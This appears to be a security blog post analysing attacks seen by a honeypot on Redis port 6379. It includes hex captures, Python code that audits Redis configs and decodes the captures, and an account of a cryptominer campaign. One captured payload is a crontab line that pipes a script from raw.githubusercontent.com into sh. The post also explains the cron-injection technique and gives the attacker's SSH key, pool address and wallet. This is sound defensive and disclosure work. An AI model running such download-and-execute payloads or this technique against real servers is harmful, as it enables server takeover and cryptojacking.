TCP port 6379, the Redis port, regularly receives odd connections. These target misconfigured Redis servers, ones reachable from the Internet without authentication. A typical connection looks like the following:

2a330d0a24360d0a434f4e4649470d0a *3..$6..CONFIG..
24330d0a4745540d0a24310d0a2a0d0a $3..GET..$1..*..
636f6e66696720676574206469720d0a config get dir..
696e666f0a info.

We don’t have much Redis experience, but these seem to be just testing whether the target server (a honeypot in this instance…) will answer with configuration information. The first line is a CONFIG GET * in Redis’s RESP wire format (an array of three bulk strings: *3, then $6 CONFIG, $3 GET, $1 *), followed by the same kind of request in Redis’s inline format (config get dir) and an INFO. An unauthenticated CONFIG GET dir tells the scanner where Redis writes its dump file, which matters for the attack below. Some of these are likely precursors to other attacks, while many are certainly just network scanners learning about the Internet. The examples have the hex dump on the left and the ASCII rendering on the right, of course.
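As an added illustration, not part of the original post, here is what the misconfiguration these probes look for amounts to: a constructed redis.conf fragment that answers CONFIG GET to anyone on the Internet, next to a hardened one, with a small Python check that flags the exposed one. The directive names (bind, protected-mode, requirepass, rename-command) are Redis’s own; the sample values and the parse_conf/audit_conf functions are this example’s assumptions.

```python
"""Audit a redis.conf for the exposure the port-6379 probes above are testing for.

Added example, not code from the original post. The two config samples are
constructed; the directive names are real Redis directives.
"""

# Constructed sample: an instance that answers CONFIG GET to anyone on the Internet.
WEAK_CONF = """\
bind 0.0.0.0
port 6379
protected-mode no
"""

# Constructed sample: local-only listener, password required, CONFIG renamed away
# so that even an authenticated client cannot retarget the dump file.
HARDENED_CONF = """\
bind 127.0.0.1
port 6379
protected-mode yes
requirepass 5f1c6a9c0d3e4b2a8e7f6d5c4b3a2918f7e6d5c4b3a2918f
rename-command CONFIG ""
rename-command FLUSHALL ""
"""


def parse_conf(text):
    """Map each directive (lower-cased) to the list of argument lists it was given.

    Repeated directives (rename-command, for instance) are all kept.
    """
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit_conf(text):
    """Return a list of findings; an empty list means none of the checks fired."""
    conf = parse_conf(text)
    findings = []

    # No bind directive means Redis listens on every interface.
    bind = conf.get("bind")
    if bind is None or any(addr in ("0.0.0.0", "::", "*") for addr in bind[-1]):
        findings.append("bind: listening on all interfaces")

    # protected-mode exists since Redis 3.2 and defaults to yes; turning it off
    # reopens the instance to unauthenticated remote clients.
    mode = conf.get("protected-mode", [["yes"]])[-1]
    if mode and mode[0].lower() == "no":
        findings.append("protected-mode no: unauthenticated remote clients accepted")

    # Without a password (or ACL users) every command, including CONFIG, is open.
    if "requirepass" not in conf and "user" not in conf:
        findings.append("no requirepass/ACL: CONFIG and SET are reachable without auth")

    # Renaming CONFIG removes the CONFIG GET dir / CONFIG SET dir primitive.
    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    if "CONFIG" not in renamed:
        findings.append("CONFIG reachable under its default name")

    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_conf(text) or "no findings")
```

The check is deliberately conservative: it only reads the static file, so an instance started with command-line overrides, or one behind a firewall that already blocks 6379, needs to be judged on its running config (CONFIG GET on localhost) rather than on this output.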

Many attackers don’t bother enumerating their target before throwing an attack. The one below is like that…

2a330d0a24330d0a5345540d0a24370d *3..$3..SET..$7.
0a637261636b69740d0a2439350d0a2f .crackit..$95../
6e2f6e2f6e2a2f31202a202a202a202a n/n/n*/1 * * * *
206375726c202d6673534c2068747470  curl -fsSL http
733a2f2f7261772e6769746875627573 s://raw.githubus
6572636f6e74656e742e636f6d2f3930 ercontent.com/90
31372f6d696e692f6d61737465722f61 17/mini/master/a
372e7368207c73682f6e2f6e2f6e0d0a 7.sh |sh/n/n/n..

This attacker takes the somewhat brazen step of distributing their cryptocurrency miner via GitHub. The username is visible in the URL, “9017”: a new-ish account with three forked projects and the “mini” repo, which is their own. The value being SET is shaped like a crontab entry (every minute, fetch a7.sh and pipe it to sh). This is the long-known Redis trick of storing a crontab line in a key and then pointing the database dump at a cron directory (CONFIG SET dir and dbfilename, then SAVE) so that cron ignores the binary framing and picks up the line; those follow-up commands are not part of this capture. Note also that the payload contains a literal “/n” (bytes 2f 6e) where newline bytes were presumably intended, so the crontab line would not end up on a line of its own.
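To make the two captures concrete, here is an added Python example, not code from the original post, that decodes Redis’s wire protocol (RESP) from the hex dumps on this page, both the probe above and this SET payload, and labels each command as reconnaissance or a cron-injection attempt. The two hex strings are copied from the dumps; decode_resp, classify and the two regexes are this example’s own and go a little beyond the page by also handling inline commands and download-and-run payloads in general, not just this one.

```python
"""Decode the Redis protocol (RESP) from the hex dumps above and label each command.

Added example, not code from the original post. The two hex strings are copied
from the captures on this page; decode_resp and classify are this example's own.
"""
import binascii
import re

# Capture 1 (the probe): a RESP array CONFIG GET *, then two inline commands.
RECON_HEX = (
    "2a330d0a24360d0a434f4e4649470d0a"
    "24330d0a4745540d0a24310d0a2a0d0a"
    "636f6e66696720676574206469720d0a"
    "696e666f0a"
)

# Capture 2 (the attack): SET crackit <crontab-shaped payload>.
CRON_HEX = (
    "2a330d0a24330d0a5345540d0a24370d"
    "0a637261636b69740d0a2439350d0a2f"
    "6e2f6e2f6e2a2f31202a202a202a202a"
    "206375726c202d6673534c2068747470"
    "733a2f2f7261772e6769746875627573"
    "6572636f6e74656e742e636f6d2f3930"
    "31372f6d696e692f6d61737465722f61"
    "372e7368207c73682f6e2f6e2f6e0d0a"
)


def decode_resp(data):
    """Return a list of commands (each a list of str) from a byte stream.

    Handles the two request encodings Redis accepts: RESP arrays
    (*<n>\\r\\n$<len>\\r\\n<bytes>\\r\\n ...) and inline commands (one plain
    text line, optional \\r before the \\n). Inline quoting is not handled.
    """
    commands = []
    pos = 0
    while pos < len(data):
        if data[pos:pos + 1] == b"*":
            end = data.index(b"\r\n", pos)
            count = int(data[pos + 1:end])
            pos = end + 2
            args = []
            for _ in range(count):
                if data[pos:pos + 1] != b"$":
                    raise ValueError("expected bulk string at offset %d" % pos)
                end = data.index(b"\r\n", pos)
                length = int(data[pos + 1:end])
                start = end + 2
                args.append(data[start:start + length].decode("latin-1"))
                pos = start + length + 2  # skip the bulk string's trailing \r\n
            commands.append(args)
        else:
            end = data.find(b"\n", pos)
            if end == -1:
                end = len(data)
            line = data[pos:end].rstrip(b"\r").decode("latin-1")
            pos = end + 1
            if line.strip():
                commands.append(line.split())
    return commands


def decode_capture(hexdump):
    """Hex dump text (whitespace ignored) -> decoded commands."""
    return decode_resp(binascii.unhexlify("".join(hexdump.split())))


# Five crontab time fields followed by a command, e.g. "*/1 * * * * curl ...".
CRON_LINE = re.compile(r"(\*|\d+)(/\d+)?(\s+(\*|\d+)(/\d+)?){4}\s+\S")
# Download-and-execute one-liner.
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def classify(commands):
    """Label each decoded command as (kind, detail, note)."""
    labels = []
    for args in commands:
        verb = args[0].upper()
        if verb == "INFO" or (verb == "CONFIG" and len(args) > 1 and args[1].upper() == "GET"):
            labels.append(("recon", verb, ""))
        elif verb == "SET" and len(args) >= 3 and (
                CRON_LINE.search(args[2]) or FETCH_AND_RUN.search(args[2])):
            # A key holding a crontab line only pays off once the dump file is
            # written into a cron directory; the literal "/n" in this payload,
            # where newline bytes (0x0a) would be needed, is worth noting.
            note = ("literal /n instead of newline"
                    if "/n" in args[2] and "\n" not in args[2] else "")
            labels.append(("cron-injection-attempt", args[1], note))
        else:
            labels.append(("other", verb, ""))
    return labels


if __name__ == "__main__":
    for hexdump in (RECON_HEX, CRON_HEX):
        for label in classify(decode_capture(hexdump)):
            print(label)
```

Run on the two dumps, the probe yields three recon labels (CONFIG, CONFIG, INFO) and the attack yields one cron-injection-attempt against the key crackit with the literal-/n note. The decoder assumes complete commands; on a live tap you would buffer until a full array has arrived before calling it.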

The a7.sh script removes any of a set of competing cryptominers that may already be installed on the target system. It takes some simple process-hiding measures, installs an iptables rule dropping traffic to 165.225.157.157 (possibly related to this: https://blog.netlab.360.com/old-botnets-never-die-and-ddg-refuse-to-fade-away-en/), adds a public key to root’s SSH authorized_keys, and downloads and installs a cryptominer.

The public key (the base64 body of an ssh-rsa key, without the “ssh-rsa” prefix) is:

AAAAB3NzaC1yc2EAAAADAQABAAABAQCxrBrcpNlLpxz9hmeIY57Ia7/yhEmSqmbDA6w4gDcGcgbmbmVOeoBJvcqDiSxBNho9MfilXPpialmLYr0UCfgHxGjQB8jyHWGI2DfbLLDdP6tPfs7r0F08vY7yVkyh39dKliK/Dlx5tIXzI3t1I7FUkvHm4oPWe5S/6snbLRwCKuwT23o/hZoCuKI7+kdxkZ//UsilHFW0JCs1rdjKFtxCz3hxT3xfK8h4urer0B/hbWNap/rTibRq3UqbIXwMYTgTcKESjS8x10UJzDqKIRqMeJWmsPN4+cLkntgnWi9uuWsmYoLHhFQehOlI4oGImG6vb11K+zEtRvg8UAg3wJ4t

The cryptominer is this one: https://www.virustotal.com/gui/file/52fdf7efddeb0264a45b73deab08c139da2b7b5fff3b31a98e1cef3edc71ce79/detection

We’ve reported this to GitHub, but haven’t seen action in over 24 hours.

The miner’s configuration (in the JSON format used by XMRig and its forks) shows where the hashing goes: “url” is the mining pool it connects to and “user” is the wallet address the proceeds are paid to, with a worker name after the dot.

{
    "algo": "cryptonight",
    "api": {
        "port": 0,
        "access-token": null,
        "id": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
    },
...
    "pools": [
        {
            "url": "47.101.30.124:13531",
            "user": "44jyrKqqad7cvtDP44X2CRAXnhbSf8fPc4R25Vc4myt8PC6orsAMFgUK3FQRSkDNXH73Aak6GgVFv4HU8yan1ugB9z7dZFp.v5201",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": false,
            "variant": 8,
            "tls": false,
            "tls-fingerprint": null
        },
    ],
...
}